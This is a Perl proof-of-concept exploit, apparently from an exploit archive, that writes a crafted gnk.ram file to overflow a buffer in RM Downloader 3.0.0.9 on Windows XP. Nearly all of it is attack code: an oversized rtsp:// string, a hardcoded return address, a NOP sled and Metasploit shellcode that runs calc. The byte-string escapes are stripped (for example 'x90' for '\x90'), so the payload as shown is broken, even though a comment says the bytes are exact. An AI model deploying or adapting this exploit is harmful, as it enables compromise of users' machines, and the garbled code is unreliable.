
# Title : RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
# Published : 2009-05-07
# Author : G4N0K


#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...From Iran

==============================================================================
	RM Downloader 3.0.0.9 (.RAM) Local Buffer Overflow Exploit
==============================================================================
	[??] Script:.............[ RM Downloader 3.0.0.9 ].......................
	[??] Website:............[ http://mini-stream.net/ ].....................
	[??] Today:..............[ 07052009 ]....................................
	[??] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================

	[x] tested on "Windows XP SP2"... [:-)
	
=cut

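use strict;
use warnings;

# Proof-of-concept file generator for the .RAM handling described in the
# header above.  The only effect of running it is to write one file, gnk.ram,
# in the current directory.  The content is the concatenation built below;
# every byte string is reproduced exactly as it appears in the original
# script and is not altered here.

# Oversized rtsp:// URL.  "x" binds tighter than ".", so this is the scheme
# string followed by 26117 repeated "G" characters.
my $MSD = "rtsp://" . "G" x 26117;

# Filler written after $RA, and the 4-byte value the original annotates as a
# Kernel32.dll address (whether that value is meaningful for any particular
# build is not established by this script).
my $SMN = "x90" x 16;
my $RA  = "x5Dx38x82x7C";    # Kernel32.dll

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

# File layout, in order: $MSD, $RA, $SMN, $Shcode.
# The original used a 2-arg open on a bareword handle with no error checking,
# so a failed open or a short write went unnoticed and the script still
# exited 0.  Append mode (">>") is kept so an existing gnk.ram is extended
# rather than replaced, exactly as before; only the failure reporting is new.
my $out_file = 'gnk.ram';
open my $ram_fh, '>>', $out_file or die "open $out_file: $!";
print {$ram_fh} $MSD . $RA . $SMN . $Shcode
    or die "write $out_file: $!";
# Buffered write errors surface at close, so it is checked as well.
close $ram_fh or die "close $out_file: $!";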
